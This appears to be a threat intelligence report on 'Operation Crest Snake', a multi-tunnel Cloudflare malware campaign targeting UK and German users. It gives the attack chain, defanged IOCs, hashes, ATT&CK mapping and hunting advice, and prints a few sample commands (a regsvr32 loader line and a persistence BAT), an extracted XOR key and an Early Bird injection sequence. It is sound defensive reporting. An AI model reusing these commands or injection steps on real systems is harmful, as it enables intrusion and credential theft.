OPERATION CREST SNAKE — Breakglass Intelligence Report

TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: Cybercrime — Multi-Stage Malware via Cloudflare Tunnel Network Status: ALL TUNNELS LIVE (as of 2026-04-03T16:10Z)

---

Executive Summary

A network of 8 Cloudflare Quick Tunnels was discovered operating a multi-stage malware delivery platform using WsgiDAV open directories. The campaign targets UK and German-speaking victims with invoice/scanner document lures, chains through a 3-tunnel architecture (Lure -> WSF Dropper -> BAT Downloader), and ultimately deploys 5 obfuscated Python-based RAT/stealer payloads plus a native x64 DLL with Early Bird APC injection capability. The operator has been active since at least September 2025 and updates payloads daily. All indicators are completely unreported — zero detections on VirusTotal, MalwareBazaar, ThreatFox, or URLhaus.

This is the same actor as Operation Nutten Tunnel (investigated 2026-04-02) based on shared infrastructure patterns, identical WsgiDAV platform, same operator build environment (Administrator on VPS), identical Edge icon LNK disguise, and overlapping tunnel usage (wet-envelope-beam-laser tunnel shared between both campaigns).

Key Findings

• 8 Cloudflare tunnels mapped belonging to single operator — all routing through Amsterdam PoP
• ZERO prior detections on any threat intel platform — entirely novel campaign
• Same actor as Nutten Tunnel: Shared tunnel (wet-envelope-beam-laser), same LNK build pattern, same Administrator VPS origin, WsgiDAV platform, German+UK targeting
• 3-tunnel chain architecture: Tunnel 1 (lure WSH) -> Tunnel 2 (WSF dropper) -> Tunnel 3 (BAT stagers) -> Tunnel 4 (ZIP payloads)
• 5 Python RAT/stealer payloads: Obfuscated with "Kramer" custom obfuscator (Python 3.12 compiled bytecode)
• Native x64 DLL (jopfgl.dll) with exported functions: get_payload, inject_early_bird, xor_decrypt — loads magde.dat (350KB, entropy 7.999)
• Campaign dating system: UKMar26, UKMar27, UKA01 (Apr 1), UKA02 (Apr 2) — daily attack waves targeting UK
• Dual targeting: German victims (FSL_DE_INV invoice LNK, rechnung.pdf) and UK victims (UK-prefixed payloads)
• OPSEC failure: SID S-1-5-21-3343087317-1842942590-547433828-500 (Administrator) embedded in LNK
• Persistence: Windows Startup folder BAT files, hidden directories, Python runtime cached in Contacts folder
• Actor evolution: Shifted from DLL sideloading (Mar 26) to Python-based payload delivery (Mar 27+) with increasing sophistication

Infrastructure Map — 8 Cloudflare Tunnels

#	Tunnel Subdomain	WsgiDAV	Role	Status	First Seen
1	crest-ind-snake-dublin	4.3.0	Lure delivery (WSH)	LIVE	2026-04-02
2	klein-changes-slim-starter	4.3.0	WSF dropper hosting	LIVE	2026-01-14
3	chubby-resident-airlines-converter	4.3.0	BAT stager hosting	LIVE	2026-04-01
4	highland-trend-src-distinct	4.3.0	ZIP payload hosting	LIVE	2025-11-28
5	wet-envelope-beam-laser	4.3.3	DLL+LNK+PDF hosting (shared w/ Nutten)	LIVE	2025-03-25
6	triangle-county-dangerous-soon	Unknown	Historical BAT host (Jan 2026)	DEAD	2026-01-14
7	peace-ray-unnecessary-dave	Unknown	Historical DLL host (Mar 26)	DEAD	2026-03-26
8	rover-earlier-baseline-karen	Unknown	Historical BAT host (Mar 27)	DEAD	2026-03-27
--	requires-fortune-nutten-eligible	4.3.3	Previous investigation (Nutten Tunnel)	LIVE	2026-03-23

Attack Chain (Current — UKA02, April 2 2026)

[1] Victim receives: Scan_0824973350935.pdf.wsh
    (Disguised as scanned PDF, actually WSH script)
    Hosted on: crest-ind-snake-dublin.trycloudflare.com/jup/
         |
         v
[2] WSH points to: klein-changes-slim-starter.trycloudflare.com/uj/UKApr02.wsf
    (Windows Script File, JScript engine)
         |
         v
[3] WSF copies from chubby-resident-airlines-converter.trycloudflare.com:
    - UKA021.txt -> %USERPROFILE%\Contacts\UKA021.bat (Stage 1: downloader)
    - UKA022.txt -> %USERPROFILE%\Contacts\UKA022.bat (Stage 2: executor)
    10-second delay between stages
         |
         v
[4] UKA021.bat (Stage 1 — Downloader):
    a. Relaunches itself hidden via VBS wrapper
    b. Downloads from highland-trend-src-distinct.trycloudflare.com:
       - 1Mar23MA.zip (16.7MB) -> Python 3.12 x64 + 5 obfuscated Python payloads
       - 1Mar23ST.zip (16.7MB) -> Second copy (stealer variant)
       - 1Mar23SU.txt -> Startup persistence BAT
    c. Extracts to %USERPROFILE%\Contacts\MainRingtones\ and \str\
    d. Installs startup persistence
         |
         v
[5] UKA022.bat (Stage 2 — Executor):
    a. Relaunches hidden
    b. Executes ALL .py files in Python312x64\ directory:
       - 1Apr02_Annnnnnnnnnnnnnnnn-obf.py (1.3MB)
       - 1Apr02_Asssssssssss-obf.py (842KB) 
       - 1Apr02_Hvvvvvvvvvvvv-obf.py (4.5MB)
       - 1Apr02_UK-Viooooooo5-obf.py (1.3MB)
       - 2LazApr02__hvvvvvvvvvvvvv.py (7.9MB)
    c. Kills Python parent processes via WMI
    d. Hides directories with attrib +h
    e. Deletes all BAT files from Contacts folder (anti-forensics)
         |
         v
[6] Python payloads execute (Kramer-obfuscated, Python 3.12 compiled bytecode):
    - An* = likely AnyDesk-based RAT
    - As* = likely AsyncRAT variant
    - Hv* = likely HVNC (Hidden VNC)
    - UK-Vio* = UK-targeted variant
    - Laz+hv* = secondary HVNC or Lazarus-linked

Attack Chain (Historical — DLL Sideloading, Mar 25-26)

[1] FSL_DE_INV_24032026_238969_EML.PDF.lnk (German invoice lure)
    SID: S-1-5-21-3343087317-1842942590-547433828-500
         |
         v
[2] cmd.exe /c start /b regsvr32 /s pnljjd.dll & start rechung.pdf
    (Registers DLL silently, opens decoy German invoice PDF)
    Both hosted on wet-envelope-beam-laser.trycloudflare.com
         |
         v
[3] UKMar26.wsf loads 4 DLLs via regsvr32 from peace-ray-unnecessary-dave:
    - dmmnknAsy.dll (AsyncRAT?)
    - pdmemeAna.dll (AnyDesk?)  
    - klnaicHvvv.dll (HVNC?)
    - bgpdpduk-vio.dll (UK variant?)
    Opens rechung.pdf as decoy

Malware Analysis

DLL Payload — jopfgl.dll (from 1MaDLL.zip)

Property	Value
SHA256	3ea83adc47138478ed646170b88581af441f24feeee7f8472868286aadb132fd
Type	PE32+ DLL (x86-64), stripped
Size	16,896 bytes
Compiled	2026-03-30T10:03:18 UTC
Imphash	88063500446cf32cf6c9ede2df6ccec0
Sections	10 (.text .data .rdata .pdata .xdata .bss .edata .idata .tls .reloc)
.text entropy	5.88 (not packed, readable code)

Exports (CRITICAL):

Ordinal	Name	Purpose
1	DllRegisterServer	COM registration hook (for regsvr32 execution)
2	DllUnregisterServer	Standard COM export
3	get_payload	Reads encrypted payload file (magde.dat)
4	inject_early_bird	Early Bird APC injection into new process
5	xor_decrypt	XOR decryption of payload

Key Imports:

• Process injection: VirtualAllocEx, WriteProcessMemory, QueueUserAPC, ResumeThread, CreateProcessW
• File operations: CreateFileW, ReadFile, GetFileSize
• Memory: VirtualAlloc, VirtualProtect, VirtualProtectEx

Associated encrypted payload — magde.dat:

Property	Value
SHA256	f30b89d5fea624867c603d97de819f64e1eb18882d5fda157c877c89f82723e7
Size	350,924 bytes
Entropy	7.999 (encrypted/compressed)
Decryption	XOR (via exported xor_decrypt function)

Python Payloads (from 1Mar23MA.zip, April 2 2026)

Filename	Size	SHA256	Suspected Purpose
1Apr02_Annnnnnnnnnnnnnnnn-obf.py	1.3MB	(extracted)	AnyDesk-based RAT
1Apr02_Asssssssssss-obf.py	842KB	(extracted)	AsyncRAT variant
1Apr02_Hvvvvvvvvvvvv-obf.py	4.5MB	(extracted)	HVNC (Hidden VNC)
1Apr02_UK-Viooooooo5-obf.py	1.3MB	(extracted)	UK-targeted payload
2LazApr02__hvvvvvvvvvvvvv.py	7.9MB	(extracted)	Secondary HVNC / Lazarus-linked

Obfuscation: Python 3.12 compiled bytecode (.pyc magic cb0d0d0a) renamed to .py. Uses custom "Kramer" class obfuscator with __decode__ method and runtime exec()/eval() deobfuscation.

Persistence Mechanism (1Mar23SU.txt)

Installs to Windows Startup folder. On reboot, executes Python scripts from 4 locations:

1. %APPDATA%\Winic\30.3.0rc50\Python312x32\ (32-bit Python, mode 2: kills explorer+nslookup parents)
2. %USERPROFILE%\Contacts\Str\python312x64\ (64-bit Python, mode 1)
3. %USERPROFILE%\Contacts\Str\python312x644\ (64-bit Python, second instance)
4. Uses VBS helper DiscordDial.vbs for parent process termination via WMI

Connection to Operation Nutten Tunnel

Evidence	Nutten Tunnel	Crest Snake	Match
WsgiDAV Server	v4.3.3	v4.3.0 + v4.3.3	PARTIAL (shared wet-envelope tunnel is 4.3.3)
CF-Ray PoP	Amsterdam (AMS)	Amsterdam (AMS)	YES
LNK build user	Administrator	Administrator (SID: ...828-500)	YES
Edge icon disguise	Yes	Yes	YES
WebDAV over SSL	Yes	Yes	YES
Target language	German (DKM bank)	German (FSL invoice) + UK	YES (expanded)
Shared tunnel	wet-envelope-beam-laser	wet-envelope-beam-laser	DIRECT LINK
Attack pattern	WSH->JS->BAT->Python->shellcode	WSH->WSF->BAT->Python+DLL	EVOLVED
Python runtime	Python 3.11.8 (downloaded)	Python 3.12 x64 (bundled)	UPGRADED
Encryption	AES-256-CBC	XOR (DLL) + Kramer obfuscator (Python)	CHANGED
Persistence	CryptoLoader.lnk in Startup	Random-named BAT in Startup	EVOLVED

Attribution confidence: HIGH — Same actor, evolved TTPs. The shared wet-envelope-beam-laser tunnel is definitive proof of unified infrastructure ownership.

Actor Timeline

Date	Activity	Evidence
2025-09-01	Earliest payload reference	Sep01x86_Ayoo.zip on highland-trend tunnel
2025-11-28	Sep01x86_Ayoo.zip uploaded	File timestamp on highland-trend
2025-12-15	Startup BAT template created	1Mar23SU.bat timestamp
2026-01-14	1PhJ14.wsf deployed	WSF dropper via triangle-county tunnel
2026-03-23	Nutten Tunnel campaign begins	LNK+WSH+JS+BAT chain (German-targeted)
2026-03-25	German invoice LNK (FSL_DE_INV)	wet-envelope-beam-laser tunnel
2026-03-26	Multi-DLL campaign	UKMar26.wsf — 4 DLLs via peace-ray tunnel
2026-03-27	Shift to BAT stagers	UKMar27.wsf — rover-earlier tunnel
2026-03-30	jopfgl.dll compiled	PE timestamp + 1MaDLL.zip
2026-04-01	UKA01 campaign (UK-targeted)	BAT stagers + DLL via regsvr32
2026-04-02	UKA02 campaign (current)	Full Python+DLL chain, 5 payloads

Threat Actor Profile

Attribution Assessment

• Confidence: HIGH (same actor as Nutten Tunnel)
• Country/Region: Likely European (Amsterdam routing, German+UK targeting)
• Motivation: Financial (RAT/stealer deployment, credential theft)
• Sophistication: MODERATE-HIGH (multi-tunnel architecture, daily payload rotation, custom obfuscator, Early Bird injection)
• OPSEC Failures:
  • SID embedded in LNK: S-1-5-21-3343087317-1842942590-547433828-500
  • Built on VPS as Administrator (same as Nutten: C:\Users\Administrator)
  • Open directory with read-write anonymous access
  • Payload naming reveals malware families (An=AnyDesk, As=Async, Hv=HVNC, Vio=?)
  • Historical payloads left accessible on tunnels
  • Descriptive filenames like "rechung.pdf" reveal targeting

Naming Convention Analysis

The actor uses a consistent payload naming scheme:

• An/Ann = AnyDesk/AnyDesk-based RAT
• As/Ass = AsyncRAT
• Hv/Hvv = HVNC (Hidden Virtual Network Computing)
• UK-Vio = UK-targeted variant (possibly ViolateStealer?)
• Laz = Unknown (Lazarus reference? or Lazy loader?)
• -obf suffix = obfuscated
• Date prefix = campaign date (1Apr02, 1SApr02)
• S prefix in second ZIP = "stealer" or "second" variant

IOC Summary

Network Indicators (Defanged)

Active Tunnels:

• hxxps://crest-ind-snake-dublin[.]trycloudflare[.]com/ (Lure)
• hxxps://klein-changes-slim-starter[.]trycloudflare[.]com/ (WSF dropper)
• hxxps://chubby-resident-airlines-converter[.]trycloudflare[.]com/ (BAT stagers)
• hxxps://highland-trend-src-distinct[.]trycloudflare[.]com/ (ZIP payloads)
• hxxps://wet-envelope-beam-laser[.]trycloudflare[.]com/ (DLL+LNK+PDF)

Dead Tunnels (historical):

• hxxps://triangle-county-dangerous-soon[.]trycloudflare[.]com/
• hxxps://peace-ray-unnecessary-dave[.]trycloudflare[.]com/
• hxxps://rover-earlier-baseline-karen[.]trycloudflare[.]com/
• hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/ (Nutten Tunnel)

File Indicators

File	SHA256
Scan_0824973350935.pdf.wsh	99f2048b16cfd0729c85f2c1822ea06507925b2be06186e80544eac18772ed4f
UKApr02.wsf	79eb3a25e8cd93bda05e3f86897de2d057a776be68a95586eedad6566c79c2c4
UKA021.txt (BAT Stage 1)	53dfef40de6d91c71ff6ae676a609bd1e82a70c6cf9478a89909ee7e258b516e
UKA022.txt (BAT Stage 2)	218628edc95f7c425fad294048adca65e235ae3024f084c9afaf483f66f71b6c
UKA011.txt (Apr1 Stage 1)	a05ca4e0e257ee5bd584ddd8dfdb3d5c9f6d87dbc46b7afe1c1e6a0ab6467c4e
UKA012.txt (Apr1 Stage 2)	7fd6934f8fd8ef0e78ae37ab04f31aed8543a8bd2a1dac0b388ce8fe074c3086
1Mar23SU.txt (persistence)	6056329246bf6ef61ff8eae8bf7697ea59bfc3413cd7c9ce338e51e302264f46
1Mar23SU.bat (old persistence)	832326f3a377973a35cb465bd3510f5f6199c7454a0e0557e4f95b85313a76a5
jopfgl.dll	3ea83adc47138478ed646170b88581af441f24feeee7f8472868286aadb132fd
magde.dat (encrypted payload)	f30b89d5fea624867c603d97de819f64e1eb18882d5fda157c877c89f82723e7
init.cmd	766ab64ffd028972b40e7c171525891b1f06a9d381b3f5072de82d77b29f7682
FSL_DE_INV_24032026_238969_EML.PDF.lnk	5e112f4229dd70373d9d348fc649a1de971243c610f83e80b95a24910375b28e
1MaDLL.zip	314c2cb202e4cea8d63051325abe326dfb75ae2995e843f6e8eea247290f59a1
1Mar23MA.zip	802b7b05b9be13fee44fac9fa02a7433cedec147fe41becd3a2dfd5ad6c342b3
1Mar23ST.zip	57483ef356187724ed3ca9d7f27fdcfe6f09f0cb365f667009cb01f549704c5a
UKMar26.wsf	bd3a7e2805d2f6f371366d6847998843b98298a748c45dd3ef6014b85697c4ae
UKMar27.wsf	6b45e1a38609b9b7f2f2508b0b38f700a75ee1ea9b6c548d1a086bd91863efc3
1PhJ14.wsf	13a6420822dab0d4ca6c1b422c66e5dd3a59637588279097efe47f7e553eb849
TheDll.wsf	f38cd6aa26981ba1eea4fb0ec8f9db212e518f65f28556e108ef74d92e4809b6
theDll.js	f2caaf774ab4ac5e7b5d9299117eb1bad22e025a2e530ffc29496456760390b6

DLL Imphash: 88063500446cf32cf6c9ede2df6ccec0

Behavioral Indicators

File System:

• %USERPROFILE%\Contacts\MainRingtones\ (Python runtime + payloads)
• %USERPROFILE%\Contacts\str\ (second payload set)
• %USERPROFILE%\Contacts\docuts\ (staging directory, deleted after extraction)
• %APPDATA%\TokenSys\emand.dll (DLL payload, Apr 1 campaign)
• %APPDATA%\Winic\30.3.0rc50\Python312x32\ (32-bit Python persistence)
• %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\*.bat (persistence)

Processes:

• python.exe spawned from hidden BAT
• regsvr32.exe /s (DLL loading)
• wscript.exe (WSH/WSF execution)
• Parent process killing via WMI (explorer.exe -> python.exe chain)

Anti-Forensics:

• Hidden directories via attrib +h
• BAT file self-deletion from Contacts folder
• VBS helper scripts created and deleted
• Parent process termination to hide execution chain

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Initial Access	Phishing: Spearphishing Link	T1566.002	WSH lure disguised as PDF scan
Execution	Windows Script Hosting	T1059.007	WSH -> WSF -> JScript chain
Execution	Command and Scripting Interpreter: Windows Command Shell	T1059.003	BAT stagers
Execution	Command and Scripting Interpreter: Python	T1059.006	Obfuscated Python payloads
Execution	System Services: Service Execution	T1569	regsvr32 /s DLL registration
Persistence	Boot or Logon Autostart Execution: Startup Folder	T1547.001	BAT in Startup folder
Defense Evasion	Obfuscated Files or Information	T1027	Kramer Python obfuscator, .pyc as .py
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	.pdf.wsh, .PDF.lnk disguise
Defense Evasion	Process Injection: Early Bird APC Injection	T1055.004	inject_early_bird DLL export
Defense Evasion	Indicator Removal: File Deletion	T1070.004	BAT self-deletion, VBS cleanup
Defense Evasion	Hide Artifacts: Hidden Files and Directories	T1564.001	attrib +h on payload directories
Defense Evasion	Signed Binary Proxy Execution: Regsvr32	T1218.010	DLL loading via regsvr32
Command and Control	Application Layer Protocol: Web Protocols	T1071.001	WebDAV over HTTPS (trycloudflare)
Command and Control	Proxy: Multi-hop Proxy	T1090.003	Multi-tunnel Cloudflare routing

Recommended Actions

Immediate (24-48 hours)

1. Block all 9 trycloudflare tunnel subdomains at proxy/firewall
2. Hunt for %USERPROFILE%\Contacts\MainRingtones\ directory across endpoints
3. Hunt for python.exe executing from Contacts\ directory path
4. Hunt for regsvr32.exe /s with WebDAV paths in command line
5. Hunt for attrib +h on directories within %USERPROFILE%\Contacts\
6. Submit IOCs to threat intel feeds

Short-term (1-2 weeks)

1. Deploy YARA rules for Kramer obfuscator and jopfgl.dll
2. Monitor for new trycloudflare tunnels with WsgiDAV fingerprint
3. Block .wsh and .wsf file downloads at email gateway
4. Implement AppLocker rules to prevent Python execution from Contacts directory

Medium-term (1-3 months)

1. Disable WebDAV client on endpoints (WebClient service)
2. Restrict wscript.exe and cscript.exe execution via GPO
3. Monitor for imphash 88063500446cf32cf6c9ede2df6ccec0 in new submissions

References

• Operation Nutten Tunnel — Breakglass Intelligence, 2026-04-02 (/home/ghost/investigations/trycloudflare-wsgidev/)
• Source: @smica83 tweet reporting open directory
• WsgiDAV: https://github.com/mar10/wsgidav/
• Cloudflare Quick Tunnels: https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/

DLL Deep Dive — jopfgl.dll Reverse Engineering

XOR Decryption Key (Extracted from .rdata)

vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4

32-byte repeating XOR key. Applied with key[i & 0x1f] (i mod 32).

Installation Paths (from .rdata unicode strings)

• %s\magde.dat — encrypted shellcode payload
• %s\Microsoft\DiagSvc\ — installation directory (masquerades as Windows Diagnostic Service)
• %s\msv1_0.dll — DLL after installation (masquerades as Windows security DLL)
• %s\CertificateCheck.bat — persistence BAT (@echo off\r\nstart /min "" regsvr32 /s "%s")
• notepad.exe — target process for injection

Execution Flow (from disassembly)

1. DllRegisterServer (called by regsvr32 /s) -> calls setup -> calls inject_early_bird
2. inject_early_bird -> calls get_payload -> reads magde.dat from same directory as DLL
3. get_payload -> reads file -> calls xor_decrypt with 32-byte key
4. Decrypted data = 350,924 bytes of position-independent shellcode (Donut-style loader)
5. CreateProcessW creates suspended process (notepad.exe)
6. VirtualAllocEx + WriteProcessMemory + QueueUserAPC + ResumeThread
7. Shellcode executes in notepad.exe context

Shellcode Analysis (magde_decrypted.bin)

• Size: 350,924 bytes (342.7 KB)
• SHA256: 22752253be3a10a4598bc8fc0a80810d397a32c0cd27637db92122dc28c95878
• Structure: CALL/POP shellcode (classic position-independent pattern)
  • Offset 0x00000: E8 C0 25 05 00 (CALL +0x525C0)
  • Offset 0x525C5: 59 (POP RCX — gets shellcode base address)
  • Data blob: 0 to 0x525C5 (337,349 bytes, entropy 7.999 — encrypted/compressed)
  • Loader code: 0x525C5 to end (13,575 bytes, entropy 6.17 — executable code)
• Loader: Donut-style configuration structure at shellcode base
  • Resolves APIs via hash-based function at 0x5544C
  • Uses configuration offsets at [RCX+0x28], [RCX+0x88], [RCX+0xa0], [RCX+0xa8], [RCX+0x208], [RCX+0x238]
  • Creates thread/process and injects decrypted payload
• Inner payload: Unknown — data blob requires second-stage decryption by the loader

Compiler

• GCC: (x86_64-posix-seh-rev0, Built by MinGW-Builds project) 15.1.0
• Runtime: Mingw-w64

Comparison with Nutten Tunnel — Actor Evolution

The Nutten Tunnel investigation (2026-04-02) documented a 6-stage German-targeted attack chain using AES-256-CBC encryption, Python 3.11.8 downloaded from python.org, and process injection via VirtualAllocEx/WriteProcessMemory/CreateRemoteThread.

This investigation reveals the same actor has significantly evolved:

Aspect	Nutten Tunnel (Mar 23-31)	Crest Snake (Apr 1-2)
Architecture	Single tunnel + WebDAV chain	8-tunnel network (3-hop delivery)
Lure	German bank document (DKM)	Scanner document + German invoice (FSL)
Target	Germany only	Germany + UK (daily campaigns: UKMar26, UKMar27, UKA01, UKA02)
Python	3.11.8 (downloaded at runtime)	3.12 x64 (bundled in ZIP, 16.7MB)
Encryption	AES-256-CBC (as_key.bin + as_encrypted.bin)	XOR-32 (hardcoded key in DLL) + Kramer obfuscator
Injection	CreateRemoteThread into explorer.exe	Early Bird APC injection into notepad.exe
Payloads	1 encrypted shellcode	5 Python RATs + 1 DLL + 1 shellcode
DLL	None	Custom x64 DLL with named exports
Persistence	CryptoLoader.lnk	Random BAT + CertificateCheck.bat + multi-path Python execution
WsgiDAV	v4.3.3	v4.3.0 (new tunnels) + v4.3.3 (shared tunnel)
Anti-forensics	Minimal	VBS helper cleanup, directory hiding, BAT self-deletion, parent process killing

Assessment: This actor is rapidly iterating. They shifted from a single-payload approach to a multi-RAT deployment in under 10 days. The addition of named DLL exports (get_payload, inject_early_bird, xor_decrypt) suggests modular tooling development. The 8-tunnel architecture provides redundancy — if one tunnel is taken down, others remain operational.

---

Report generated by GHOST — Breakglass Intelligence "One indicator. Total infrastructure."